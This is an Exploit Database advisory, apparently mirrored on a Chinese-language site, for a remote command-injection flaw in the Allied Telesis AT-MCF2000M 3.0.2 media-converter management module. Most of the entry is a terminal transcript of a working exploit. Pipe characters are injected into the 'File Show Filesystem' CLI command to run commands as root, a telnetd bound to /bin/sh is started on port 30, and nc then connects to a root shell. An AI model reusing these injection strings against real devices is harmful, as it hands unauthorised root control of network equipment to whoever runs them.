Allied Telesis AT-MCF2000M 3.0.2 – Remote Command Execution

• Exploit Database
• 15 阅读

• 作者： dun
  日期： 2013-01-03
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/23855/

• :::::::-. ...::::::.:::.
  ;;, `';, ;; ;;;`;;;;,`;;;
  `[[ [[[[' [[[[[[[[. '[[
   $$,$$$$$$$$$$ "Y$c$$
   888_,o8P'88.d888888Y88
   MMMMP"` "YmmMMMM""MMM YM
   
  [ Discovered by dun \ posdub[at]gmail.com ]
  [ 2013-01-02]
  ####################################################################
  #[ Allied Telesis AT-MCF2000M 3.0.2 ] Gaining Root Shell Access#
  ####################################################################
  #
  # Device: "The AT-MCF2000M is the management module for the AT-MCF2000 two-slot chassis.
  #With the AT-MCF2000M management module, if there is a blade failure,
  #insertion or removal, your traffic flow will not be interupted.."
  #
  # Vendor:http://www.alliedtelesis.com/
  # Product: http://www.alliedtelesis.com/p-2265.html
  # Software Download: ftp://ftp.alliedtelesis.com/pub/medconv/mcf2000/AT-S85_S97_v302.ZIP
  #
  ###################################################################
  # Vulnerability:
  
  Logging in system via ssh/telnet, is necessary to using this vulnerability.
  After logging in, user has access to client menu(/sbin/AtiCli), without access to the shell.
  User-supplied data are not validated properly. In section "File Show Filesystem=system://0/m/",
  is possible to inject command with using special characters: "|;&.
  
  Commands are limited to max 25 characters. Chars / are filtered.
  For example:
  
  # File Show Filesystem=system://0/m/";echo 11111111111111111111"
  	File name can be only up to 25 alphanumeric characters.
  <>20:54:16::File Show Filesystem=system://0/m/";echo 11111111111111111111"::DENY(CLI_STRING_LENGTH_OUT_OF_RANGE)::[00.002]
  #
  # File Show Filesystem=system://0/m/";ls -al /"
  <>20:55:00::File Show Filesystem=system://0/m/";ls -al /"::DENY(CLI_INVALID_PARAMETER)::[00.002]
  
  
  Getting root access:
  
  root@debian:~# ssh 10.11.200.2
  
  --------------------------------------------------------------------------------
  Allied Telesis Media Converter
  AT-MCF2000
  --------------------------------------------------------------------------------
  Login: manager
  Password: *******
  
  Allied Telesis Media Converter- Version 3.0.2 
   <No System Name>
  # ?
   COnfiguration - Configuration related commands
   DIagnostics - Diagnostics related commands
   File- File related commands
   IP- IP related commands
   Logging - Logging related commands
   Ntp - Ntp related commands
   Ping- Ping a host
   System- System related commands
   Telnet- Telnet related commands
   SNMP- Snmp related commands
   SSh - SSH related commands
   User- User management commands
   CLear - Clear the terminalscreen
   Help- CLI help information
   EXit- Exit
  # File Show Filesystem=system://0/m/
  Module 0/M File System:
  -rw-r--r--1 002640 Jan1 15:27 BM_0_1.cfg
  -rw-r--r--1 002612 Jan1 15:27 BM_0_2.cfg
  -rw-r--r--1 001355 Jan1 15:27 MM.cfg
  -rw-r--r--1 00 310 Dec 31 13:17 file.inf
  -rw-r--r--1 006609 Jan1 15:27 mcf_chassis0.cfg
  # File Show Filesystem=system://0/m/BM_0_1.cfg
  Module 0/M File System:
  -rw-r--r--1 002640 Jan1 15:27 BM_0_1.cfg
  # File Show Filesystem=system://0/m/test
  Module 0/M File System:
  ls: test: No such file or directory
  
  <>18:55:19::File Show Filesystem=system://0/m/test::COMPL::[00.052]
  # File Show Filesystem=system://0/m/|id
  Module 0/M File System:
  uid=0 gid=0
  # File Show Filesystem=system://0/m/|"telnetd -l${SHELL} -p30"
  Module 0/M File System:
  
  <>19:00:41::File Show Filesystem=system://0/m/|"telnetd -l${SHELL} -p30"::COMPL::[00.061]
  # File Show Filesystem=system://0/m/|"ps aux|grep telnet"
  Module 0/M File System:
   25 0 336 S /usr/sbin/telnetd -l /sbin/AtiCli
  497 0 192 S telnetd -l/bin/sh -p30
  
  <>19:01:02::File Show Filesystem=system://0/m/|"ps aux|grep telnet"::COMPL::[00.117]
  # exit
  <>19:01:40::exit::COMPL::[00.001]
  # 
  logging out.
  Connection to 10.11.200.2 closed.
  
  root@debian:~# nc 10.11.200.2 30
  
  
  BusyBox v1.01 (2005.09.07-23:28+0000) Built-in shell (ash)
  Enter 'help' for a list of built-in commands.
  
  / # id
  uid=0 gid=0
  / # uname -a
  Linux (none) 2.6.14 #2 Thu Jul 23 17:15:38 PDT 2009 ppc unknown
  / # cat /proc/version
  Linux version 2.6.14 (schen@arun-linux) (gcc version 3.4.4) #2 Thu Jul 23 17:15:38 PDT 2009
  / # ls -al
  drwxr-xr-x 15 1046 1002 1024 Jan1 18:58 .
  drwxr-xr-x 15 1046 1002 1024 Jan1 18:58 ..
  -rw-r--r--1 00 125 Jan1 19:10 .ash_history
  -rw-r--r--1 00 0 Jan1 13:24 1
  drwxr-xr-x2 001024 Aug 102009 bin
  drwxr-xr-x3 00 0 Jan1 15:27 cfg
  drwxr-xr-x4 002048 Aug 102009 dev
  drwxr-xr-x 10 001024 Jan11970 etc
  drwxr-xr-x4 001024 Aug 102009 lib
  drwxr-xr-x2 00 12288 Aug 102009 lost+found
  drwxr-xr-x3 001024 Aug 102009 mnt
  dr-xr-xr-x 49 00 0 Jan11970 proc
  drwx------2 001024 Aug 102009 root
  drwxr-xr-x2 001024 Aug 102009 sbin
  drwxrwxrwt2 001024 Jan1 19:06 tmp
  drwxr-xr-x6 001024 Aug 102009 usr
  drwxr-xr-x7 001024 Jan11970 var
  / # echo pwnd! :) & exit
  pwnd! :)
  Connection closed by foreign host.
  root@debian:~#